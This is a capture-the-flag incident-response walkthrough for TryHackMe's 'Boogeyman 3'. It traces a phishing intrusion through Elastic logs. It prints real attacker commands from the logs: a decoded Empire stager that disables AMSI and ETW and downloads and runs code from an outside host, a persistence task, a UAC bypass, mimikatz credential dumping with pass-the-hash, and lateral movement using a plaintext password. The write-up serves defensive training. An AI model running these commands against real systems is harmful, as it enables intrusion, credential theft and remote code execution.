Boogeyman 3

The Boogeyman emerges from the darkness again.

CONTEXT

Challenge Link: TryHackMe - Boogeyman 3

I. Background

Without tripping any security defences of Quick Logistics LLC, the Boogeyman was able to compromise one of the employees and stayed in the dark, waiting for the right moment to continue the attack. Using this initial email access, the threat actors attempted to expand the impact by targeting the CEO, Evan Hutchinson.

1. Incident

The email appeared questionable, but Evan still opened the attachment despite the scepticism. After opening the attached document and seeing that nothing happened, Evan reported the phishing email to the security team.

2. Initial Investigation

Upon receiving the phishing email report, the security team investigated the workstation of the CEO. During this activity, the team discovered the email attachment in the downloads folder of the victim.

The security team also observed a file inside the ISO payload, as shown in the image below.

Lastly, the security team presumed that the incident occurred between August 29 and August 30, 2023.

II. Artifacts

1. THM AttackBox

There are multiple services running for this room:

$ nmap --min-rate 1000 -p- -v 10.10.138.205

  PORT     STATE SERVICE
  22/tcp   open  ssh
  80/tcp   open  http
  9200/tcp open  wap-wsp
  9300/tcp open  vrace

These mainly belong to a hosted ELK Stack application, meaning TCP port 9200 should be the Elasticsearch REST API.

2. Elastic API

Windows Event Logs appear to have been ingested into the platform (the winlogbeat-* indices):

$ curl http://elastic:elastic@10.10.241.17:9200/_cat/indices?v

  health status index                               uuid                   pri rep docs.count docs.deleted store.size pri.store.size
  green  open   .geoip_databases                    lM0DBBCZRzeTnKl49aAmJA   1   0          3            0      2.6mb          2.6mb
  green  open   .security-7                         Fp59LRkXSwm1jHrq8gpibg   1   0         60            0      258kb          258kb
  green  open   .apm-custom-link                    Ek1KihMXRwOoAIGOBcIU-w   1   0          0            0       226b           226b
  green  open   .kibana_task_manager_7.17.6_001     WSbAubYpTRmGec9_aFSUHg   1   0         18         3447      1.4mb          1.4mb
  green  open   .apm-agent-configuration            ffMaJ0oFQZKgTziSPYgewg   1   0          0            0       226b           226b
  green  open   .async-search                       2-WPoD_4QpOoKpd0SBYM2g   1   0          0            0       252b           252b
  green  open   .kibana_7.17.6_001                  lXdTCB9mRHm56zAO4YZ50A   1   0         42            0      4.8mb          4.8mb
  yellow open   winlogbeat-7.17.6-2023.11.02-000002 CDv3Ai6xSvu2HhxvzaUcjA   1   1          0            0       226b           226b
  yellow open   winlogbeat-7.17.6-2023.08.29-000001 9g4EM-4oRImckEii7zspjg   1   1      29093            0     47.6mb         47.6mb
  green  open   .tasks                              7kEiTgXrTwmguQ3TbIgUHA   1   0         12            0     57.7kb         57.7kb

The following JSON query gives an overview of what the analyst will be dealing with:

{
  "query": {
    "bool": {
      "must": {
        "wildcard": {
          "user.name": "*"
        }
      },
      "should": [{
        "match": {
          "event.category": "process"
        }
      }],
      "filter": {
        "range": {
          "@timestamp": {
            "gte": "2023-08-29T00:00:00",
            "lte": "2023-08-31T00:00:00"
          }
        }
      }
    }
  },
  "_source": ["user.name", "host.hostname"]
}

Of the first 10000 logs returned for the specified timeframe (the query favours process creation events), the bulk were generated by evan.hutchinson and allan.smith:

$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=10000 | jq -r '.hits.hits[]."_source".user.name' | sort | uniq -c | sort -nr

   5337 evan.hutchinson
   1837 allan.smith
   1767 Administrator
    427 DC01$
    385 SYSTEM
    104 WKSTN-0051$
     42 itadmin
     22 WKSTN-1327$
     22 LOCAL SERVICE
     21 NETWORK SERVICE
   [..omitted..]

Looking at the hostnames of the same logs, more than half were generated on WKSTN-0051, which is assumed from here on to be the workstation of evan.hutchinson:

$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=10000 | jq -r '.hits.hits[]."_source".host.hostname' | sort | uniq -c | sort -nr

   5695 WKSTN-0051
   2174 DC01
   2131 WKSTN-1327

ANALYSIS

For this section, the following JSON query will be used, with the value of user.name changed depending on the user being investigated. Note that in a bool query a should clause only affects scoring once a must clause is present, so it does not restrict the results to process events; that is why the pipelines below also grep for command_line:

{
  "query": {
    "bool": {
      "must": {
        "term": {
          "user.name": "<USERNAME OF INTEREST>"
        }
      },
      "should": [{
        "match": {
          "event.category": "process"
        }
      }],
      "filter": {
        "range": {
          "@timestamp": {
            "gte": "2023-08-29T00:00:00",
            "lte": "2023-08-31T00:00:00"
          }
        }
      }
    }
  },
  "_source": ["@timestamp", "host.hostname", "user.name", "user.domain", "process.name", "process.command_line", "process.pid", "process.parent.name", "process.parent.executable", "process.parent.pid"]
}

I. WKSTN-0051

Upon execution of the HTA file (PID 6392), three new processes were spawned:

$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp")  \(.user.name)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep 6392              

  2023-08-29T23:51:15.856Z  evan.hutchinson	6392	2940	"C:\Windows\SysWOW64\mshta.exe" "D:\ProjectFinancialSummary_Q3.pdf.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} 
  2023-08-29T23:51:16.738Z  evan.hutchinson	3832	6392	"C:\Windows\System32\xcopy.exe" /s /i /e /h D:\review.dat C:\Users\EVAN~1.HUT\AppData\Local\Temp\review.dat
  2023-08-29T23:51:16.771Z  evan.hutchinson	3680	6392	"C:\Windows\System32\rundll32.exe" D:\review.dat,DllRegisterServer
  2023-08-29T23:51:16.809Z  evan.hutchinson	6204	6392	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $A = New-ScheduledTaskAction -Execute 'rundll32.exe' -Argument 'C:\Users\EVAN~1.HUT\AppData\Local\Temp\review.dat,DllRegisterServer'; $T = New-ScheduledTaskTrigger -Daily -At 06:00; $S = New-ScheduledTaskSettingsSet; $P = New-ScheduledTaskPrincipal $env:username; $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S; Register-ScheduledTask Review -InputObject $D -Force;

It copies the implant (review.dat) into the user's Temp folder and executes its DllRegisterServer export via rundll32.exe. It then creates a scheduled task named Review that runs the same DLL daily at 06:00, presumably for persistence:

$A = New-ScheduledTaskAction -Execute 'rundll32.exe' -Argument 'C:\Users\EVAN~1.HUT\AppData\Local\Temp\review.dat,DllRegisterServer'; 
$T = New-ScheduledTaskTrigger -Daily -At 06:00; 
$S = New-ScheduledTaskSettingsSet; 
$P = New-ScheduledTaskPrincipal $env:username; 
$D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S; 
Register-ScheduledTask Review -InputObject $D -Force;

To trace what review.dat does, the child PIDs of its rundll32.exe process were followed:

$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp")  \(.user.name)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep 3680 

  2023-08-29T23:51:16.771Z  evan.hutchinson	3680	6392	"C:\Windows\System32\rundll32.exe" D:\review.dat,DllRegisterServer
  2023-08-29T23:51:17.116Z  evan.hutchinson	4672	3680	"C:\Windows\System32\rundll32.exe" D:\review.dat,DllRegisterServer
  
$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp")  \(.user.name)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep 4672

  2023-08-29T23:51:17.116Z  evan.hutchinson	4672	3680	"C:\Windows\System32\rundll32.exe" D:\review.dat,DllRegisterServer
  2023-08-29T23:53:47.951Z  evan.hutchinson	6660	4672	"C:\Windows\system32\cmd.exe" /c "whoami /all"
  2023-08-29T23:54:12.765Z  evan.hutchinson	5496	4672	"C:\Windows\system32\net.exe" users
  2023-08-29T23:54:16.129Z  evan.hutchinson	6932	4672	"C:\Windows\system32\net.exe" localgroup administrators
  2023-08-29T23:54:48.565Z  evan.hutchinson	4504	4672	"C:\Windows\system32\whoami.exe" /groups
  2023-08-29T23:54:48.608Z  evan.hutchinson	4468	4672	"C:\Windows\system32\whoami.exe" /groups
  2023-08-29T23:54:49.043Z  evan.hutchinson	5308	4672	"C:\Windows\system32\fodhelper.exe" 
  2023-08-29T23:54:49.213Z  evan.hutchinson	5180	4672	"C:\Windows\system32\fodhelper.exe" 
  2023-08-30T01:40:37.178Z  evan.hutchinson	2260	4672	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$credential = (New-Object PSCredential -ArgumentList ('QUICKLOGISTICS\allan.smith', (ConvertTo-SecureString 'Tr!ckyP@ssw0rd987' -AsPlainText -Force))) ; Invoke-Command -Credential $credential -ComputerName WKSTN-1327 -ScriptBlock {powershell -enc <base64 omitted>}"

Based on the sequence of user and group enumeration commands followed by fodhelper.exe, the attacker appears to have gained elevated (local administrator) privileges on WKSTN-0051 as evan.hutchinson; fodhelper.exe is a well-known UAC bypass vector, primarily on Windows 10.

It is also worth noting that the last execution listed above is a lateral movement attempt to WKSTN-1327 as allan.smith, which is covered later. For now, looking into the executions spawned from fodhelper.exe:

$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp")  \(.user.name)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep 5180

  2023-08-29T23:54:49.213Z  evan.hutchinson	5180	4672	"C:\Windows\system32\fodhelper.exe" 
  2023-08-29T23:54:49.444Z  evan.hutchinson	7116	5180	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x

It reads a base64-encoded string from the registry value HKCU:\Software\Microsoft\Windows Update\Update and runs it via PowerShell. The decoded command can be recovered from the logs by following the execution:

$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp")  \(.user.name)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep 7116

  2023-08-29T23:54:49.444Z  evan.hutchinson	7116	5180	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x
  2023-08-29T23:54:50.125Z  evan.hutchinson	6160	7116	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden -enc <base64 omitted>
  
$ echo "<base64 omitted>" | base64 -d

  If($PSVersionTable.PSVersion.Major -ge 3){$Ref=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');$Ref.GetField('amsiInitFailed','NonPublic,Static').Setvalue($Null,$true);[System.Diagnostics.Eventing.EventProvider].GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0);};[System.Net.ServicePointManager]::Expect100Continue=0;$wc=New-Object System.Net.WebClient;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$ser=$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcAA6AC8ALwBjAGQAbgAuAGIAYQBuAGEAbgBhAHAAZQBlAGwAcABhAHIAdAB5AC4AbgBlAHQAOgA4ADAA')));$t='/news.php';$wc.Headers.Add('User-Agent',$u);$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;$Script:Proxy = $wc.Proxy;$K=[System.Text.Encoding]::ASCII.GetBytes('}wS1&VNqoIY*G#5-Plv{p2f=4Z?uat@<');$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};$wc.Headers.Add("Cookie","rlkHVXWbb=TpmUDibXpfiUU1/mwqwmentgb3I=");$data=$wc.DownloadData($ser+$t);$iv=$data[0..3];$data=$data[4..$data.length];-join[Char[]](& $R $data ($IV+$K))|IEX
  
$ echo "aAB0AHQAcAA6AC8ALwBjAGQAbgAuAGIAYQBuAGEAbgBhAHAAZQBlAGwAcABhAHIAdAB5AC4AbgBlAHQAOgA4ADAA" | base64 -d

  http://cdn.bananapeelparty.net:80

It is an Empire stager that calls back to cdn.bananapeelparty.net:80; the network events for PID 6160 show the connections going to 165.232.170.151:80:

$ cat query_net.json 

  {
    "query": {
      "bool": {
        "must": {
          "term": {
            "process.pid": "6160"
          }
        },
        "should": [{
          "match": {
            "event.category": "network"
          }
        }],
        "filter": {
          "range": {
            "@timestamp": {
              "gte": "2023-08-29T00:00:00",
              "lte": "2023-08-31T00:00:00"
            }
          }
        }
      }
    },
    "_source": ["@timestamp", "host.hostname", "source.ip", "source.port", "destination.ip", "destination.port"]
  }
  
$ curl -d "$(cat query_net.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | jq -r '"\(.host.hostname)\t\(.destination.ip):\(.destination.port)"' | sort | uniq -c | sort -nr

   2424 WKSTN-0051	165.232.170.151:80
     23 WKSTN-0051	null:null
      5 WKSTN-0051	10.10.97.43:389
      2 WKSTN-0051	185.199.110.133:443
      1 WKSTN-0051	185.199.111.133:443
      1 WKSTN-0051	185.199.109.133:443
      1 WKSTN-0051	140.82.121.3:443
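The decoded one-liner above is the standard Empire launcher: the C2 base URL is hidden as base64 over UTF-16LE, the /news.php request carries a session cookie, and the response is a 4-byte IV followed by RC4 ciphertext keyed with IV + staging key, which the $R scriptblock decrypts before IEX. The Python below is an added example, not code from the writeup or the room, that pulls those indicators out of the launcher text and mirrors $R so a captured staging response can be decrypted offline; the launcher fragment is trimmed from the page's own decode (prologue and proxy set-up cut), and the staging blob in the test is constructed.

```python
"""Extract C2 indicators from a decoded Empire launcher and decrypt its staging response."""
import base64
import re

# Fragment of the launcher decoded above (constructed: the AMSI/ETW prologue and proxy set-up
# are cut; the C2 string, URI, staging key and cookie are the ones from the page).
LAUNCHER = (
    "$ser=$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String("
    "'aAB0AHQAcAA6AC8ALwBjAGQAbgAuAGIAYQBuAGEAbgBhAHAAZQBlAGwAcABhAHIAdAB5AC4AbgBlAHQAOgA4ADAA')));"
    "$t='/news.php';$wc.Headers.Add('User-Agent',$u);"
    "$K=[System.Text.Encoding]::ASCII.GetBytes('}wS1&VNqoIY*G#5-Plv{p2f=4Z?uat@<');"
    '$wc.Headers.Add("Cookie","rlkHVXWbb=TpmUDibXpfiUU1/mwqwmentgb3I=");'
    "$data=$wc.DownloadData($ser+$t);$iv=$data[0..3];$data=$data[4..$data.length];"
    "-join[Char[]](& $R $data ($IV+$K))|IEX"
)


def decode_encoded_command(b64: str) -> str:
    """Decode a powershell -enc argument, or Empire's $ser string: base64 over UTF-16LE text."""
    return base64.b64decode(b64).decode("utf-16-le")


def extract_indicators(launcher: str) -> dict:
    """Pull the C2 server, URI, staging key and session cookie out of a launcher one-liner."""
    def grab(pattern: str) -> str:
        match = re.search(pattern, launcher)
        if match is None:
            raise ValueError(f"launcher does not contain {pattern!r}")
        return match.group(1)

    server = decode_encoded_command(grab(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)"))
    uri = grab(r"\$t='([^']+)'")
    return {
        "server": server,
        "uri": uri,
        "url": server + uri,
        "staging_key": grab(r"ASCII\.GetBytes\('([^']+)'\)"),
        "cookie": grab(r'Headers\.Add\("Cookie","([^"]+)"\)'),
    }


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 as the launcher's $R scriptblock implements it: KSA over the key, then PRGA XOR."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) % 256])
    return bytes(out)


def decrypt_stage(blob: bytes, staging_key: bytes) -> str:
    """Mirror `$iv=$data[0..3]; $data=$data[4..]; & $R $data ($IV+$K)`: 4-byte IV, key = IV + staging key."""
    iv, body = blob[:4], blob[4:]
    return rc4(iv + staging_key, body).decode("latin-1")  # [Char[]] cast: one char per byte


if __name__ == "__main__":
    for name, value in extract_indicators(LAUNCHER).items():
        print(f"{name:12} {value}")
```

The same decode_encoded_command also recovers the -enc payloads stored in the registry by the fodhelper.exe and schtasks.exe stages of this intrusion.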

Following the commands spawned by the Empire stager (PID 6160), the attacker enumerated the domain with PowerView, then downloaded and ran mimikatz.exe to dump credentials and authenticate as itadmin via Pass-the-Hash:

$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp")  \(.user.name)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep 6160

  [..omitted..]
  2023-08-29T23:55:17.945Z  evan.hutchinson	4896	6160	"C:\Windows\system32\cmd.exe" /c "whoami /all"
  2023-08-30T00:06:38.162Z  evan.hutchinson	7736	6160	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1 -useb); Get-DomainComputer"
  2023-08-30T00:08:56.421Z  evan.hutchinson	6328	6160	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1 -useb); Get-Domain"
  2023-08-30T00:09:23.529Z  evan.hutchinson	4844	6160	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1 -useb); Get-DomainUser"
  2023-08-30T00:09:57.186Z  evan.hutchinson	6968	6160	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iwr https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip -outfile mimi.zip"
  2023-08-30T00:10:15.314Z  evan.hutchinson	5532	6160	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Expand-Archive mimi.zip"
  2023-08-30T00:11:26.438Z  evan.hutchinson	4948	6160	"C:\Windows\Temp\m\x64\mimi\x64\mimikatz.exe" privilege::debug sekurlsa::logonpasswords exit
  2023-08-30T00:13:37.090Z  evan.hutchinson	1892	6160	"C:\Windows\Temp\m\x64\mimi\x64\mimikatz.exe" "sekurlsa::pth /user:itadmin /domain:QUICKLOGISTICS /ntlm:F84769D250EB95EB2D7D8B4A1C5613F2 /run:powershell.exe" exit
  [..omitted..]

II. WKSTN-1327

Using Invoke-ShareFinder from PowerView.ps1, the attacker appears to have discovered credentials for allan.smith in a file named IT_Automation.ps1 on the ITFiles share of WKSTN-1327, and then executed commands on WKSTN-1327 remotely via Invoke-Command:

$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp")  \(.user.name)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep 6160

  [..omitted..]
  2023-08-30T00:14:36.078Z  evan.hutchinson	3312	6160	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1 -useb); Invoke-ShareFinder"
  2023-08-30T00:18:38.647Z  evan.hutchinson	3288	6160	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "ls FileSystem::\\WKSTN-1327.quicklogistics.org\ITFiles"
  2023-08-30T00:19:52.889Z  evan.hutchinson	4820	6160	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "cat FileSystem::\\WKSTN-1327.quicklogistics.org\ITFiles\IT_Automation.ps1"
  2023-08-30T00:20:23.384Z  evan.hutchinson	7952	6160	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$credential = (New-Object PSCredential -ArgumentList (" "QUICKLOGISTICS\allan.smith, (ConvertTo-SecureString Tr!ckyP@ssw0rd987 -AsPlainText -Force))) ; Invoke-Command -Credential $credential -ComputerName WKSTN-1327 -ScriptBlock {whoami}"
  2023-08-30T00:20:56.818Z  evan.hutchinson	6848	6160	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$credential = (New-Object PSCredential -ArgumentList ('QUICKLOGISTICS\allan.smith', (ConvertTo-SecureString 'Tr!ckyP@ssw0rd987' -AsPlainText -Force))) ; Invoke-Command -Credential $credential -ComputerName WKSTN-1327 -ScriptBlock {whoami}"
  [..omitted..]

Another Empire stager was executed on the new workstation using the same method:

$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp")  \(.user.name)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep 6160

  [..omitted..]
  2023-08-30T00:21:52.606Z  evan.hutchinson	4976	6160	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$credential = (New-Object PSCredential -ArgumentList ('QUICKLOGISTICS\allan.smith', (ConvertTo-SecureString 'Tr!ckyP@ssw0rd987' -AsPlainText -Force))) ; Invoke-Command -Credential $credential -ComputerName WKSTN-1327 -ScriptBlock {powershell -enc <base64 omitted>}"
  
$ echo "SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBqAEEARwBRAEEAYgBnAEEAdQBBAEcASQBBAFkAUQBCAHUAQQBHAEUAQQBiAGcAQgBoAEEASABBAEEAWgBRAEIAbABBAEcAdwBBAGMAQQBCAGgAQQBIAEkAQQBkAEEAQgA1AEEAQwA0AEEAYgBnAEIAbABBAEgAUQBBAE8AZwBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAGEAZABtAGkAbgAvAGcAZQB0AC4AcABoAHAAJwA7ACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAdwBjAC4AUAByAG8AeAB5AD0AWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBEAGUAZgBhAHUAbAB0AFcAZQBiAFAAcgBvAHgAeQA7ACQAdwBjAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQATgBlAHQAdwBvAHIAawBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAOwAkAFMAYwByAGkAcAB0ADoAUAByAG8AeAB5ACAAPQAgACQAdwBjAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAQgB5AHQAZQBzACgAJwB9AHcAUwAxACYAVgBOAHEAbwBJAFkAKgBHACMANQAtAFAAbAB2AHsAcAAyAGYAPQA0AFoAPwB1AGEAdABAADwAJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAcgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAG8AdQBuAHQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsA
JABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AYgB4AG8AcgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAEMAbwBvAGsAaQBlACIALAAiAHIAbABrAEgAVgBYAFcAYgBiAD0AMQAzAGMAZgBjAG8AOQByAFUAWAB4ADAAaQA0AEoAMwB4AFQAdQA2ADgAMgBKAEYAaQBYADAAPQAiACkAOwAkAGQAYQB0AGEAPQAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABzAGUAcgArACQAdAApADsAJABpAHYAPQAkAGQAYQB0AGEAWwAwAC4ALgAzAF0AOwAkAGQAYQB0AGEAPQAkAGQAYQB0AGEAWwA0AC4ALgAkAGQAYQB0AGEALgBsAGUAbgBnAHQAaABdADsALQBqAG8AaQBuAFsAQwBoAGEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQB0AGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==" | base64 -d

  If($PSVersionTable.PSVersion.Major -ge 3){};[System.Net.ServicePointManager]::Expect100Continue=0;$wc=New-Object System.Net.WebClient;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$ser=$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcAA6AC8ALwBjAGQAbgAuAGIAYQBuAGEAbgBhAHAAZQBlAGwAcABhAHIAdAB5AC4AbgBlAHQAOgA4ADAA')));$t='/admin/get.php';$wc.Headers.Add('User-Agent',$u);$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;$Script:Proxy = $wc.Proxy;$K=[System.Text.Encoding]::ASCII.GetBytes('}wS1&VNqoIY*G#5-Plv{p2f=4Z?uat@<');$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};$wc.Headers.Add("Cookie","rlkHVXWbb=13cfco9rUXx0i4J3xTu682JFiX0=");$data=$wc.DownloadData($ser+$t);$iv=$data[0..3];$data=$data[4..$data.length];-join[Char[]](& $R $data ($IV+$K))|IEX
  
$ echo 'aAB0AHQAcAA6AC8ALwBjAGQAbgAuAGIAYQBuAGEAbgBhAHAAZQBlAGwAcABhAHIAdAB5AC4AbgBlAHQAOgA4ADAA' | base64 -d

  http://cdn.bananapeelparty.net:80

To confirm that the Invoke-Command executions were successful, the logs for allan.smith show the commands being spawned by wsmprovhost.exe, the WinRM host process, meaning the attempts went through:

